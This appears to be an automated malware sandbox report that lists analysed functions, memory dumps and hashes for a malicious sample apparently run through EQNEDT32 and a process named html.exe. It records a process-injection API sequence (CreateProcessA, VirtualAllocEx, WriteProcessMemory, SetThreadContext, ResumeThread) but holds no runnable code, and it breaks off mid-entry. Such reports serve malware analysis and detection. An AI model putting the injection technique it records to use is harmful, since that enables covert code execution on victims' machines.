Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 036106F5

Memory Dump Source

Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 036106F7 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 35682110413f3e8b839c982bea318819a9232f05f53e77b850865cb7c1a7f862
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 39D092762165029FDB05DF04CA94E57F37AFFD8611B28C268E5048B759E730E8E2CA94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03610583 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(03610571), ref: 03610583

Memory Dump Source

Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 470357c518d1ac3c00264b8293baa80544763bc2a9cee40f4a232e1ddf90b0a4
Instruction ID: 1856431921edf35c80ad2cd51cef91b8b9e0ea4d02682540b42d5178e13bfd96
Opcode Fuzzy Hash: 470357c518d1ac3c00264b8293baa80544763bc2a9cee40f4a232e1ddf90b0a4
Instruction Fuzzy Hash: B511E6A682E7C45FCB12D7301E7A085BF607D9310074C85CFC0848E1A3E6658ABAC3D6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: html.exePID: 3220, Parent PID: 3148COMMON

Execution Graph

Execution Coverage:	14.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	160
Total number of Limit Nodes:	2

Executed Functions

Function 002504D8 Relevance: 9.5, Strings: 6, Instructions: 1992
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C6o, xrefs: 00251462
C6o, xrefs: 002514C6
C6o, xrefs: 002513FE
C6o, xrefs: 00251494
P?6o, xrefs: 002513CC
C6o, xrefs: 00251430

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID:
String ID: P?6o$C6o$C6o$C6o$C6o$C6o
API String ID: 0-1292629685
Opcode ID: d2826c0dbfc701ed8fbc0dbdde05332c461467d871f84e3430152e918aa72399
Instruction ID: 53eacd0546c5b214694eb9621ba38c9b9edb0d3d19a32e80bf1d054920cbbd2d
Opcode Fuzzy Hash: d2826c0dbfc701ed8fbc0dbdde05332c461467d871f84e3430152e918aa72399
Instruction Fuzzy Hash: AE23C334A10219CFCB55DF68C994B99B7B6FF89301F1185E9E809AB361DB31AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002511C0 Relevance: 9.3, Strings: 6, Instructions: 1846
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C6o, xrefs: 00251462
C6o, xrefs: 002514C6
C6o, xrefs: 002513FE
C6o, xrefs: 00251494
P?6o, xrefs: 002513CC
C6o, xrefs: 00251430

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID:
String ID: P?6o$C6o$C6o$C6o$C6o$C6o
API String ID: 0-1292629685
Opcode ID: 0477981ae5e7b073e2eb11a2b3742265a3a2f8295d3b4c8473e1917b74f83986
Instruction ID: 4b8c6531e9f1e5417fc9c3af16f5e06f7a8239e2d420041eb29e9a37ad81ae8f
Opcode Fuzzy Hash: 0477981ae5e7b073e2eb11a2b3742265a3a2f8295d3b4c8473e1917b74f83986
Instruction Fuzzy Hash: CF13C234A10218CFCB65DF64C994B99B7B6FF89301F5185E9E809AB361DB31AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002567A0 Relevance: 1.7, Strings: 1, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[, xrefs: 00256B31

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: a2e0ab0d028f9b00f18be8693083da305bf431739c4811ef22beb3b5ac2ece99
Instruction ID: 4e0d0b40e5527ee74d8d3385ed557258f3fd423bafcea19b6d6dcc968072c9b0
Opcode Fuzzy Hash: a2e0ab0d028f9b00f18be8693083da305bf431739c4811ef22beb3b5ac2ece99
Instruction Fuzzy Hash: 96329374E11229CFDB64DF65C894B9DBBB2BF88301F5085EAD809AB254DB309E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0025678F Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

[, xrefs: 00256B31

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 75d9bf012c13d8d01ea1956928e0ce7b6689a6b44c0169cacb7b564003f251ce
Instruction ID: 86d2f78c75190f61743ebbdb8428817353b83939bfcfa9e55514b54597eb2c24
Opcode Fuzzy Hash: 75d9bf012c13d8d01ea1956928e0ce7b6689a6b44c0169cacb7b564003f251ce
Instruction Fuzzy Hash: 53C1A374E11229CFDB64DF69C884B9DBBB2BF88301F5485AAD409AB354DB309E85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0025A400 Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bcd75d312fb1f2978cbfe23c7dd9a05b2da63e4c1d6805a9d43dc22d7968223
Instruction ID: d16181ddd4df7446cd7674e5bf50515a136ad2aa47c8056017df03b151e37d96
Opcode Fuzzy Hash: 7bcd75d312fb1f2978cbfe23c7dd9a05b2da63e4c1d6805a9d43dc22d7968223
Instruction Fuzzy Hash: F622C074E102298FDB54CFA9C981B9DFBB2BF88301F2482A9D819E7345D734A985CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002545BA Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c81fc44f0f8bd6644d0d60e9593c063f1c6d8d7349b703447257ee2b17fce3b1
Instruction ID: 2c9f45403a1051cd508840199f44808057dbbee36f495c2b7ca5549776cb0f23
Opcode Fuzzy Hash: c81fc44f0f8bd6644d0d60e9593c063f1c6d8d7349b703447257ee2b17fce3b1
Instruction Fuzzy Hash: 65C11874E102198FDB14DFA9C891B9EFBB2AF89305F2084A9D809E7351DB309E85CF01

Uniqueness

Uniqueness Score: -1.00%

Function 007319B0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398889244.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_730000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4605a7e54b3f5c303d080adf1429b3ae7f782ae6b4f3243103b1b41c22e2f679
Instruction ID: bc97edf6c736054042ea65f45cc47c3a2f129efec8901e19d7ac9055df794256
Opcode Fuzzy Hash: 4605a7e54b3f5c303d080adf1429b3ae7f782ae6b4f3243103b1b41c22e2f679
Instruction Fuzzy Hash: 4FE0463880E388CFD701DF20AC911F8BBFDAB0B311F542096884E9B2A3D73888589B15

Uniqueness

Uniqueness Score: -1.00%

Function 00731C58 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398889244.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_730000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca611b063997881fa51f821abeab6e3bc63c591d222db72663dd46a6c538b2d
Instruction ID: d417d4ec4fe5ee6d3a24fa98f15105ddb778253de4d715f63049d9d82d2e1985
Opcode Fuzzy Hash: 7ca611b063997881fa51f821abeab6e3bc63c591d222db72663dd46a6c538b2d
Instruction Fuzzy Hash: B7E01778C0E284CFD742DB609D956F4BBFDAB0B341F5824EA8449A7263C23884149F29

Uniqueness

Uniqueness Score: -1.00%

Function 00730040 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00730307

Memory Dump Source

Source File: 00000009.00000002.398889244.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_730000_html.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1d06bd6d29232ace248983239e90508000acadeb2725edf7cb59618026b6fa6c
Instruction ID: b6a8a79e94f24ae5fcc40fa100c011f2870cb0820e88a1be86d99ff84c5b6952
Opcode Fuzzy Hash: 1d06bd6d29232ace248983239e90508000acadeb2725edf7cb59618026b6fa6c
Instruction Fuzzy Hash: 75C147B0D0022D8FEF24CFA4C855BEEBBB1BB49300F1091A9D819B7241DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0025F7D9 Relevance: 1.6, APIs: 1, Instructions: 121
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F8B3

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 78bffb84885a3f62a762607be26471e9cbf9bf4fad7cfa21ed2bcf44ef249c97
Instruction ID: b68f6d15659b1ab0cb392d4507adc6b518ffb5ade8d0266a3e7ed5b0f8e35ad2
Opcode Fuzzy Hash: 78bffb84885a3f62a762607be26471e9cbf9bf4fad7cfa21ed2bcf44ef249c97
Instruction Fuzzy Hash: F941ABB5D012599FDF00CFA9D984ADEFBB1BB49310F24942AE814BB210D335AA55CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0025F7E0 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F8B3

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d745550c9f56f5d53f054a90fe30d7c796e14dcc2dcb02b2378a0f04301c89c5
Instruction ID: d712647bd0e96259357b73269af5a12d8f60cbdedfe64684547bfb81fa6cc453
Opcode Fuzzy Hash: d745550c9f56f5d53f054a90fe30d7c796e14dcc2dcb02b2378a0f04301c89c5
Instruction Fuzzy Hash: B741ABB5D012589FDF00CFA9D984ADEBBF1BB49310F20942AE814BB210D775AA55CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0025F938 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F9F2

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a2ca2f949fd3767d4150eb0c90458bd930501335e63eb72c236e57658f66712e
Instruction ID: d04c5b021db73f0a137beb0452df7240210f26eb8e3b2b8d465e91c97b64ce62
Opcode Fuzzy Hash: a2ca2f949fd3767d4150eb0c90458bd930501335e63eb72c236e57658f66712e
Instruction Fuzzy Hash: 3B41BBB4D002599FCF00CFA9D984AEEFBB1BF49310F20942AE814B7210D775A955CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0025F940 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025F9F2

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d1a75126f9b9c1f6a9ecad031035f2f64e1cf80f47a9c1f5be58a9f44ff3bd25
Instruction ID: 049aeaa30780b783000455c56f5e397c49281aa00dfa9942e3945aff595c4d39
Opcode Fuzzy Hash: d1a75126f9b9c1f6a9ecad031035f2f64e1cf80f47a9c1f5be58a9f44ff3bd25
Instruction Fuzzy Hash: EF4199B4D00258DFCF00CFA9D984AEEFBB1BB49310F20942AE814B7210D775A955DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0025F6B0 Relevance: 1.6, APIs: 1, Instructions: 108
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025F762

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: eadd6358e4d482b31283c3cf9cb115ad5094e3ba28068052824ca83a4fe862f8
Instruction ID: 7660107f07ef0e2a186cc340a0eb34490c790f2ad897b70dd38de2048d8bc4ab
Opcode Fuzzy Hash: eadd6358e4d482b31283c3cf9cb115ad5094e3ba28068052824ca83a4fe862f8
Instruction Fuzzy Hash: 1641AAB8D002589FCF10CFA9D984ADEFBB5BB49310F20942AE814BB210D775A955CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0025F6B8 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025F762

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fde60535cd102276fbefe9e95241811695560d89912061fe3738fc1fbc1a043d
Instruction ID: bc26b01e1e22b07ce41a4f4f7679a21525e5362b004bc1b810e7f12ef97b9f9d
Opcode Fuzzy Hash: fde60535cd102276fbefe9e95241811695560d89912061fe3738fc1fbc1a043d
Instruction Fuzzy Hash: 2D41A8B8D002589FCF00CFA9D984ADEFBB1AB49310F20942AE814BB210D775A915CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0025F581 Relevance: 1.6, APIs: 1, Instructions: 98
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0025F637

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6462f45e37cbf908cca78248590389ecfd18abd1829fa478513c57fd8d4b4246
Instruction ID: 1c7ca402bff9a14df083dac0bbc8801d59d179cd89caf7da70fe193c5673b2f6
Opcode Fuzzy Hash: 6462f45e37cbf908cca78248590389ecfd18abd1829fa478513c57fd8d4b4246
Instruction Fuzzy Hash: 2241BBB4D10258DFDB10CFA9D984AEEFBF1BB49314F24842AE818B7250D739A949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0025F588 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0025F637

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: bf06d634563cf31f2e8159dda8f5d1377f313ee83a212f3efdb1232594090e09
Instruction ID: ac6f0e22af440b151743db5244091aa7c8ffbab57ca90b7021149fd6a87147f1
Opcode Fuzzy Hash: bf06d634563cf31f2e8159dda8f5d1377f313ee83a212f3efdb1232594090e09
Instruction Fuzzy Hash: 7441BCB4D102589FDB10CFA9D984AEEBBF5AB49310F24842AE818B7250D778A949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0025EC20 Relevance: 1.6, APIs: 1, Instructions: 78
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0025ECA6

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6f719d7eb4530074d65994edd78d90b557119f570746dd5284178f3fd30679fe
Instruction ID: 0131d2692b66f1cb68d863509eefe201a430033c39df08575c1689f1a640ac4d
Opcode Fuzzy Hash: 6f719d7eb4530074d65994edd78d90b557119f570746dd5284178f3fd30679fe
Instruction Fuzzy Hash: EA31CAB4D10218DFDF14CFA9D984AEEFBB1AB89310F24842AE818B7210D735A905CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0025EC28 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0025ECA6

Memory Dump Source

Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_250000_html.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4db7985c6077e2e5d0d67c4d2113c1a0b90114d2f70cb37385ecb8c7aa670b61
Instruction ID: 9dc8018ebabf40abe4d0fe64a94e0915ff5276becf1c791e2f2ac6a4e3b16a55
Opcode Fuzzy Hash: 4db7985c6077e2e5d0d67c4d2113c1a0b90114d2f70cb37385ecb8c7aa670b61
Instruction Fuzzy Hash: B831D9B4D102189FDF14CFA9D984ADEFBB4EB89310F20842AE818B7300D735A905CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00D3D0E8 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d30000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adbcc8aa8ae1aa7b5391f823e66fcd21ebdb0dc2bb4eede19034df079aace5ea
Instruction ID: e32e1c1164af429cb9747ba205e855671e1f5e791b8678994153be1ab9124e2f
Opcode Fuzzy Hash: adbcc8aa8ae1aa7b5391f823e66fcd21ebdb0dc2bb4eede19034df079aace5ea
Instruction Fuzzy Hash: D461B474E05208CFDB08CFA5D994AEEFBB6BF89301F20912AD419AB365D7309945DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00D387F8 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d30000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ab816e1e33df13f7c38e796cb9e7ee13e5b0c81b415726792827ff93ad271da
Instruction ID: 8c96cccd521f36d39035c6d9b254989b18a08c7b1abdcca4a4ca337314cf61cc
Opcode Fuzzy Hash: 5ab816e1e33df13f7c38e796cb9e7ee13e5b0c81b415726792827ff93ad271da
Instruction Fuzzy Hash: 6A51D374E042089FDB05DFA9E885AEEBBF6FB89301F609065E805B7365CB349945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D385E0 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d30000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3ffa78fee33ea3056d89fd0f84bf570cf8c69828bdc23d85a44408066367f1
Instruction ID: cd3a725e4d31d51147a304110d46fbd9092081e5ecff2f3a22514f1f45c5276b
Opcode Fuzzy Hash: 0c3ffa78fee33ea3056d89fd0f84bf570cf8c69828bdc23d85a44408066367f1
Instruction Fuzzy Hash: 5641F274E012189FCB04DFA8D984AEEBBB1FB4C321F149555E810B3365DB31A994CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D3AA18 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d30000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80272145d507a0b9655209f1cba9ea552224dab0a553eec50941bd04033a809e
Instruction ID: d28cf3da3105e17c74f7370a9c8f1aed36bf55af9876dee8108d3d127d897b14
Opcode Fuzzy Hash: 80272145d507a0b9655209f1cba9ea552224dab0a553eec50941bd04033a809e
Instruction Fuzzy Hash: 70411374E002199FCB04DFA9D580AAEF7B2EB89310F24846AE855E7340DB31D902CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D3F7F0 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d30000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1face931aa2d2230c06b760a46b70f2bfae0eb8953b5419fc614fa63ebb0bb00
Instruction ID: aecbf5001f715296f9fb20f71bd3ad8ca0ec59afa64d37f03ea24712cc8bc0ec
Opcode Fuzzy Hash: 1face931aa2d2230c06b760a46b70f2bfae0eb8953b5419fc614fa63ebb0bb00
Instruction Fuzzy Hash: 2241D0B5D1521CDBCB08CFA8D884AEDFBB5FF48311F14912AD459A7211D730A955CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D382D0 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d30000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae2ed2491e371b802f418029141b58a381af3baac475a2d06a291ff71e9e5d0
Instruction ID: 2c6c5a63fdfcb57641137487a4bff820ee8521805d3dfecc7180b8d1ccec6647
Opcode Fuzzy Hash: 2ae2ed2491e371b802f418029141b58a381af3baac475a2d06a291ff71e9e5d0
Instruction Fuzzy Hash: 6A314C78E002099FDB05DF98D881AEEBBB1FF49310F108565E904B7394DB709A41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 000CD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398690686.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cd000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b24d3ae0972c68641f26aeab9c05a16bad31542cbf1f10ef9bbc4b2b04e3e9f
Instruction ID: 384fcc3a594544b326b53f3349db85a83f38a80697b5c99dcb90ad4d8117fd3c
Opcode Fuzzy Hash: 7b24d3ae0972c68641f26aeab9c05a16bad31542cbf1f10ef9bbc4b2b04e3e9f
Instruction Fuzzy Hash: DC21AF75604340DFEB24DF18D884F1ABBA5EB84314F34C6BEE9494B246C336D856CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 000CD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398690686.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cd000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5e10ddde0beb98204c734a35da197ab784c520951dfbcb07bc5e52c524de218
Instruction ID: 072f7c880c57057b96ee5c8a6153849dabb27f5f5ef9b60ef982cdb97faebde4
Opcode Fuzzy Hash: d5e10ddde0beb98204c734a35da197ab784c520951dfbcb07bc5e52c524de218
Instruction Fuzzy Hash: 1521D0B5604300EFEB11DF10D9C4F2ABBA1EB94314F24C6BEE8494B282C336D846DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D37FE8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d30000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d218dddbddf4ba6be71896c46f9c0c981c9d08ce7cf6ed07b87463793f6c033e
Instruction ID: 7c71cbbf5e5d9eff70d687f7165debb2874ee97dfa3376c225b5c041413b7821
Opcode Fuzzy Hash: d218dddbddf4ba6be71896c46f9c0c981c9d08ce7cf6ed07b87463793f6c033e
Instruction Fuzzy Hash: 1431BE74A10A08DFD748DF5AE68499DBBF1FF88305F6280D4D844AB369EB30AE54DB14

Uniqueness

Uniqueness Score: -1.00%

Function 000CD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398690686.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cd000_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04ee2cc03feb2e60b9518c1080a430690b0961dda54e488a29dc9cc76c870925
Instruction ID: 40c097a2b4d64f445e0cab08808d2fd568358b129f573f06c8a57785d86ff72c
Opcode Fuzzy Hash: 04ee2cc03feb2e60b9518c1080a430690b0961dda54e488a29dc9cc76c870925
Instruction Fuzzy Hash: 5E2180755083809FDB02CF14D994B15BFB1EB46314F28C5EBD8498F267C33A985ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00D3DA40 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.398956352.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d30000_html.jbxd

Similarity

